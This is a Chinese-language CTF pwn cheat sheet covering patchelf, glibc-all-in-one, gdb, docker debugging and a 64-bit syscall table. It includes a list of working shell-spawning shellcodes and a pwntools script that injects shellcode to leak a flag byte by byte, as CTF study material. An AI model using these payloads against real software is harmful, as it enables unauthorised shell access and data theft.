
技巧总结

总结一些常用的技巧。

patchelf——替换文件的libc和ld

如果出题方没有提供 libc/ld,请看下文技巧「glibc-all-in-one——查找libc/ld/.debug」。

更换前:

装载命令:

# Give both the new ld and the new libc as absolute paths: a relative path is
# resolved against the working directory at run time, not against the binary.
# patchelf rewrites the binary in place, so work on a copy. The ld and libc
# should come from the same glibc build (here both are 2.31).
# Replace the interpreter (ld)
# patchelf --set-interpreter /path/to/ld.so /path/to/binary
patchelf --set-interpreter /home/anza/hgame/spfa/ld-2.31.so ./spfa
# Replace libc
# patchelf --replace-needed originlibc newlibc /path/to/binary
patchelf --replace-needed libc.so.6 /home/anza/hgame/spfa/libc-2.31.so ./spfa

更换后:

glibc-all-in-one——查找libc/ld/.debug

patchelf修改了 libc/ld,而 gdb 调试时会去寻找 libc 目录下的 .debug 文件,所以无法使用一些 heap/bins 之类的命令,因此我们去 glibc-all-in-one 中下载对应版本的 libc 及其附带的 .debug。

实现操作如下:

cd /glibc-all-in-one/

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo python3 update_list
[+] Common list has been save to "list"
[+] Old-release list has been save to "old_list"

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cat list
2.23-0ubuntu11.3_amd64
2.23-0ubuntu11.3_i386
2.23-0ubuntu3_amd64
2.23-0ubuntu3_i386
2.27-3ubuntu1.5_amd64
2.27-3ubuntu1.5_i386
2.27-3ubuntu1.6_amd64
2.27-3ubuntu1.6_i386
2.27-3ubuntu1_amd64
2.27-3ubuntu1_i386
2.31-0ubuntu9.7_amd64
2.31-0ubuntu9.7_i386
2.31-0ubuntu9.9_amd64
2.31-0ubuntu9.9_i386
2.31-0ubuntu9_amd64
2.31-0ubuntu9_i386
2.35-0ubuntu3.1_amd64
2.35-0ubuntu3.1_i386
2.35-0ubuntu3_amd64
2.35-0ubuntu3_i386
2.36-0ubuntu1_amd64
2.36-0ubuntu1_i386

fuzz@fuzz-virtual-machine:/glibc-all-in-one$ sudo ./download 2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one$ cd libs/
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ ls
2.31-0ubuntu9.7_amd64
fuzz@fuzz-virtual-machine:/glibc-all-in-one/libs$ cd 2.31-0ubuntu9.7_amd64

在该目录下ctrl+h便能显示出隐藏文件.debug,将.debug复制到题目的目录下,gdb调试命令就恢复了。

gdb带基址调试

# pwndbg's $rebase(off) adds the PIE load base to a file-relative offset,
# so the breakpoint can be set before knowing where the binary was mapped
b *$rebase(0x相对基址偏移)

关闭Alarm

命令行关闭法:

# Rewrites every "alarm" byte string in the file to "isnan". Both names are
# five bytes, so the dynamic string table keeps its layout and the import
# simply resolves to a harmless libc function instead. Only works on a
# dynamically linked binary that imports alarm by name; -i edits in place,
# so run it on a copy of the binary.
sed -i s/alarm/isnan/g ./vuln

docker调试命令

基本命令:

# List all containers, including stopped ones
docker ps -a
# Start a stopped container by id
docker start 容器id
# Open an interactive shell inside a running container
docker exec -it 容器id /bin/bash
# Copy a local file into the container (host path first, then container path)
docker cp 本地路径 容器id:容器路径

docker 打开 tmux,以及打开鼠标滚动:

# Start a new tmux session; mouse scrolling is enabled inside it with
# `set -g mouse on` (or persistently via ~/.tmux.conf)
tmux new

docker 在 tmux 下调试脚本需添加:

# pwntools: open gdb (gdb.attach / gdb.debug) in a horizontal tmux split
# instead of a new terminal window, which is what works inside a container
context.terminal = ['tmux', 'sp', '-h']

一些shellcode

# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode 23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

可能用到的爆破脚本:

from pwn import *
import string


# # 这里的pwn只是为了演示流程,具体逻辑还得看题目
def pwn(p, index, ch):
    """Send one probe to the target and return nothing.

    The probe is a short x86-64 routine: it opens ``flag`` from the working
    directory, reads up to 0x30 bytes of it, and compares the byte at
    ``index`` with ``ch`` (an integer byte value).  On a match it spins in an
    infinite loop, otherwise it calls exit(0); the caller tells the two
    outcomes apart by whether the connection stays open.  ``p`` is a pwntools
    tube and ``asm`` is pwntools' assembler.  The routine is prefixed with 20
    NOP bytes.
    """
    steps = [
        # open("flag", O_RDONLY)
        "push 0x67616c66; mov rdi, rsp; mov rsi, 0x0; mov rax, 0x2; syscall;",
        # read(3, rsp, 0x30)
        "mov rdi, 0x3; mov rsi, rsp; mov rdx, 0x30; mov rax, 0x0; syscall;",
        # compare the probed byte with the candidate
        "cmp byte ptr[rsi+{}], {}; jz loop;".format(index, ch),
        # exit(0) on mismatch, spin forever on match
        "xor edi, edi; mov rax, 60; syscall; loop: jmp loop;",
    ]
    payload = b"\x90" * 20 + asm("".join(steps))
    p.send(payload)

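def main():
    """Recover the flag one byte at a time through the alive/dead oracle of pwn().

    For each offset below 0x30 the candidates in ``string.printable`` are tried
    in order.  A candidate that leaves the target alive (``p.recv`` presumably
    times out instead of raising EOF -- confirm against pwntools) is taken as
    correct and appended; a candidate that makes the target exit raises inside
    the ``try`` and is skipped.  The search stops once a ``}`` is appended.

    Fixes over the original: the candidate index is bounded, so an offset with
    no matching candidate raises RuntimeError instead of looping forever on
    IndexError (each such iteration spawned a new process); and the index is
    advanced even when ``p.close()`` fails, so progress is guaranteed.
    """
    flag = ""
    flag_str = string.printable
    for offset in range(0x30):
        index = 0
        while True:
            if index >= len(flag_str):
                raise RuntimeError(
                    "no candidate matched at offset {} (flag so far: {!r})".format(offset, flag)
                )
            p = process("./babystack")
            try:
                ch = flag_str[index]
                print(">>>>>>>>>>> test ch {}".format(ch))
                pwn(p, offset, ord(ch))
                p.recv(timeout=1)
                flag += ch
                print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> find flag: ", flag)
                p.close()
                index += 1
                break
            except Exception as e:
                # recv() (or an earlier step) raised: the target exited, so the
                # candidate byte differed.
                print("=" * 10)
                print(e)
                print("=" * 10)
                try:
                    p.close()
                except Exception as e:
                    # close() can also fail on an already-dead process; report it
                    # but do not let it stall the search.
                    print("=" * 10)
                    print(e)
                    print("=" * 10)
                index += 1
                continue
        if flag[-1] == "}":
            # Closing brace marks the end of the flag.
            break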

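# Run the search only when executed as a script, so importing this module
# (e.g. to reuse pwn()) does not start spawning processes.
if __name__ == "__main__":
    main()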

linux 下查找

查找内容包含特定字符串的文件:

grep -rn "__dls3" ./

查找文件名中包含特定字符串的文件:

find ./ -name '*2021-11-01*'

常见 signal

image-20230907201341848

64 位系统调用

系统调用号 函数名 入口点
0 read sys_read
1 write sys_write
2 open sys_open
3 close sys_close
4 stat sys_newstat
5 fstat sys_newfstat
6 lstat sys_newlstat
7 poll sys_poll
8 lseek sys_lseek
9 mmap sys_mmap
10 mprotect sys_mprotect
11 munmap sys_munmap
12 brk sys_brk
13 rt_sigaction sys_rt_sigaction
14 rt_sigprocmask sys_rt_sigprocmask
15 rt_sigreturn stub_rt_sigreturn
16 ioctl sys_ioctl
17 pread64 sys_pread64
18 pwrite64 sys_pwrite64
19 readv sys_readv
20 writev sys_writev
21 access sys_access
22 pipe sys_pipe
23 select sys_select
24 sched_yield sys_sched_yield
25 mremap sys_mremap
26 msync sys_msync
27 mincore sys_mincore
28 madvise sys_madvise
29 shmget sys_shmget
30 shmat sys_shmat
31 shmctl sys_shmctl
32 dup sys_dup
33 dup2 sys_dup2
34 pause sys_pause
35 nanosleep sys_nanosleep
36 getitimer sys_getitimer
37 alarm sys_alarm
38 setitimer sys_setitimer
39 getpid sys_getpid
40 sendfile sys_sendfile64
41 socket sys_socket
42 connect sys_connect
43 accept sys_accept
44 sendto sys_sendto
45 recvfrom sys_recvfrom
46 sendmsg sys_sendmsg
47 recvmsg sys_recvmsg
48 shutdown sys_shutdown
49 bind sys_bind
50 listen sys_listen
51 getsockname sys_getsockname
52 getpeername sys_getpeername
53 socketpair sys_socketpair
54 setsockopt sys_setsockopt
55 getsockopt sys_getsockopt
56 clone stub_clone
57 fork stub_fork
58 vfork stub_vfork
59 execve stub_execve
60 exit sys_exit
61 wait4 sys_wait4
62 kill sys_kill
63 uname sys_newuname
64 semget sys_semget
65 semop sys_semop
66 semctl sys_semctl
67 shmdt sys_shmdt
68 msgget sys_msgget
69 msgsnd sys_msgsnd
70 msgrcv sys_msgrcv
71 msgctl sys_msgctl
72 fcntl sys_fcntl
73 flock sys_flock
74 fsync sys_fsync
75 fdatasync sys_fdatasync
76 truncate sys_truncate
77 ftruncate sys_ftruncate
78 getdents sys_getdents
79 getcwd sys_getcwd
80 chdir sys_chdir
81 fchdir sys_fchdir
82 rename sys_rename
83 mkdir sys_mkdir
84 rmdir sys_rmdir
85 creat sys_creat
86 link sys_link
87 unlink sys_unlink
88 symlink sys_symlink
89 readlink sys_readlink
90 chmod sys_chmod
91 fchmod sys_fchmod
92 chown sys_chown
93 fchown sys_fchown
94 lchown sys_lchown
95 umask sys_umask
96 gettimeofday sys_gettimeofday
97 getrlimit sys_getrlimit
98 getrusage sys_getrusage
99 sysinfo sys_sysinfo
100 times sys_times
101 ptrace sys_ptrace
102 getuid sys_getuid
103 syslog sys_syslog
104 getgid sys_getgid
105 setuid sys_setuid
106 setgid sys_setgid
107 geteuid sys_geteuid
108 getegid sys_getegid
109 setpgid sys_setpgid
110 getppid sys_getppid
111 getpgrp sys_getpgrp
112 setsid sys_setsid
113 setreuid sys_setreuid
114 setregid sys_setregid
115 getgroups sys_getgroups
116 setgroups sys_setgroups
117 setresuid sys_setresuid
118 getresuid sys_getresuid
119 setresgid sys_setresgid
120 getresgid sys_getresgid
121 getpgid sys_getpgid
122 setfsuid sys_setfsuid
123 setfsgid sys_setfsgid
124 getsid sys_getsid
125 capget sys_capget
126 capset sys_capset
127 rt_sigpending sys_rt_sigpending
128 rt_sigtimedwait sys_rt_sigtimedwait
129 rt_sigqueueinfo sys_rt_sigqueueinfo
130 rt_sigsuspend sys_rt_sigsuspend
131 sigaltstack sys_sigaltstack
132 utime sys_utime
133 mknod sys_mknod
134 uselib
135 personality sys_personality
136 ustat sys_ustat
137 statfs sys_statfs
138 fstatfs sys_fstatfs
139 sysfs sys_sysfs
140 getpriority sys_getpriority
141 setpriority sys_setpriority
142 sched_setparam sys_sched_setparam
143 sched_getparam sys_sched_getparam
144 sched_setscheduler sys_sched_setscheduler
145 sched_getscheduler sys_sched_getscheduler
146 sched_get_priority_max sys_sched_get_priority_max
147 sched_get_priority_min sys_sched_get_priority_min
148 sched_rr_get_interval sys_sched_rr_get_interval
149 mlock sys_mlock
150 munlock sys_munlock
151 mlockall sys_mlockall
152 munlockall sys_munlockall
153 vhangup sys_vhangup
154 modify_ldt sys_modify_ldt
155 pivot_root sys_pivot_root
156 _sysctl sys_sysctl
157 prctl sys_prctl
158 arch_prctl sys_arch_prctl
159 adjtimex sys_adjtimex
160 setrlimit sys_setrlimit
161 chroot sys_chroot
162 sync sys_sync
163 acct sys_acct
164 settimeofday sys_settimeofday
165 mount sys_mount
166 umount2 sys_umount
167 swapon sys_swapon
168 swapoff sys_swapoff
169 reboot sys_reboot
170 sethostname sys_sethostname
171 setdomainname sys_setdomainname
172 iopl stub_iopl
173 ioperm sys_ioperm
174 create_module
175 init_module sys_init_module
176 delete_module sys_delete_module
177 get_kernel_syms
178 query_module
179 quotactl sys_quotactl
180 nfsservctl
181 getpmsg
182 putpmsg
183 afs_syscall
184 tuxcall
185 security
186 gettid sys_gettid
187 readahead sys_readahead
188 setxattr sys_setxattr
189 lsetxattr sys_lsetxattr
190 fsetxattr sys_fsetxattr
191 getxattr sys_getxattr
192 lgetxattr sys_lgetxattr
193 fgetxattr sys_fgetxattr
194 listxattr sys_listxattr
195 llistxattr sys_llistxattr
196 flistxattr sys_flistxattr
197 removexattr sys_removexattr
198 lremovexattr sys_lremovexattr
199 fremovexattr sys_fremovexattr
200 tkill sys_tkill
201 time sys_time
202 futex sys_futex
203 sched_setaffinity sys_sched_setaffinity
204 sched_getaffinity sys_sched_getaffinity
205 set_thread_area
206 io_setup sys_io_setup
207 io_destroy sys_io_destroy
208 io_getevents sys_io_getevents
209 io_submit sys_io_submit
210 io_cancel sys_io_cancel
211 get_thread_area
212 lookup_dcookie sys_lookup_dcookie
213 epoll_create sys_epoll_create
214 epoll_ctl_old
215 epoll_wait_old
216 remap_file_pages sys_remap_file_pages
217 getdents64 sys_getdents64
218 set_tid_address sys_set_tid_address
219 restart_syscall sys_restart_syscall
220 semtimedop sys_semtimedop
221 fadvise64 sys_fadvise64
222 timer_create sys_timer_create
223 timer_settime sys_timer_settime
224 timer_gettime sys_timer_gettime
225 timer_getoverrun sys_timer_getoverrun
226 timer_delete sys_timer_delete
227 clock_settime sys_clock_settime
228 clock_gettime sys_clock_gettime
229 clock_getres sys_clock_getres
230 clock_nanosleep sys_clock_nanosleep
231 exit_group sys_exit_group
232 epoll_wait sys_epoll_wait
233 epoll_ctl sys_epoll_ctl
234 tgkill sys_tgkill
235 utimes sys_utimes
236 vserver
237 mbind sys_mbind
238 set_mempolicy sys_set_mempolicy
239 get_mempolicy sys_get_mempolicy
240 mq_open sys_mq_open
241 mq_unlink sys_mq_unlink
242 mq_timedsend sys_mq_timedsend
243 mq_timedreceive sys_mq_timedreceive
244 mq_notify sys_mq_notify
245 mq_getsetattr sys_mq_getsetattr
246 kexec_load sys_kexec_load
247 waitid sys_waitid
248 add_key sys_add_key
249 request_key sys_request_key
250 keyctl sys_keyctl
251 ioprio_set sys_ioprio_set
252 ioprio_get sys_ioprio_get
253 inotify_init sys_inotify_init
254 inotify_add_watch sys_inotify_add_watch
255 inotify_rm_watch sys_inotify_rm_watch
256 migrate_pages sys_migrate_pages
257 openat sys_openat
258 mkdirat sys_mkdirat
259 mknodat sys_mknodat
260 fchownat sys_fchownat
261 futimesat sys_futimesat
262 newfstatat sys_newfstatat
263 unlinkat sys_unlinkat
264 renameat sys_renameat
265 linkat sys_linkat
266 symlinkat sys_symlinkat
267 readlinkat sys_readlinkat
268 fchmodat sys_fchmodat
269 faccessat sys_faccessat
270 pselect6 sys_pselect6
271 ppoll sys_ppoll
272 unshare sys_unshare
273 set_robust_list sys_set_robust_list
274 get_robust_list sys_get_robust_list
275 splice sys_splice
276 tee sys_tee
277 sync_file_range sys_sync_file_range
278 vmsplice sys_vmsplice
279 move_pages sys_move_pages
280 utimensat sys_utimensat
281 epoll_pwait sys_epoll_pwait
282 signalfd sys_signalfd
283 timerfd_create sys_timerfd_create
284 eventfd sys_eventfd
285 fallocate sys_fallocate
286 timerfd_settime sys_timerfd_settime
287 timerfd_gettime sys_timerfd_gettime
288 accept4 sys_accept4
289 signalfd4 sys_signalfd4
290 eventfd2 sys_eventfd2
291 epoll_create1 sys_epoll_create1
292 dup3 sys_dup3
293 pipe2 sys_pipe2
294 inotify_init1 sys_inotify_init1
295 preadv sys_preadv
296 pwritev sys_pwritev
297 rt_tgsigqueueinfo sys_rt_tgsigqueueinfo
298 perf_event_open sys_perf_event_open
299 recvmmsg sys_recvmmsg
300 fanotify_init sys_fanotify_init
301 fanotify_mark sys_fanotify_mark
302 prlimit64 sys_prlimit64
303 name_to_handle_at sys_name_to_handle_at
304 open_by_handle_at sys_open_by_handle_at
305 clock_adjtime sys_clock_adjtime
306 syncfs sys_syncfs
307 sendmmsg sys_sendmmsg
308 setns sys_setns
309 getcpu sys_getcpu
310 process_vm_readv sys_process_vm_readv
311 process_vm_writev sys_process_vm_writev
312 kcmp sys_kcmp
313 finit_module sys_finit_module

Python 调用给定 libc 环境的种子 rand

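import ctypes

# Load the C library whose srand()/rand() pair should be reproduced.
# "libc.so.6" resolves to the host's libc; to match a specific glibc build
# (e.g. the one shipped with a challenge) pass the path of that libc file
# here instead. Fix over the original: the snippet did not import ctypes.
libc = ctypes.CDLL("libc.so.6")

# Declare the C signatures explicitly: srand(unsigned int) returns void,
# rand() returns int.
libc.srand.argtypes = [ctypes.c_uint]
libc.srand.restype = None
libc.rand.restype = ctypes.c_int
libc.srand(0x39)
rand_result = libc.rand()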

linux 下的解压方法

*.tar tar -xvf
*.gz gzip -d 或 gunzip
*.tar.gz/*.tgz tar -xzf
*.bz2 bzip2 -d 或 bunzip2
*.tar.bz2 tar -xjf
*.Z uncompress
*.tar.Z tar -xZf
*.rar unrar e
*.zip unzip

参考

Glibc-All-In-One

关于不同版本 glibc 更换的一些问题

pwn题shellcode收集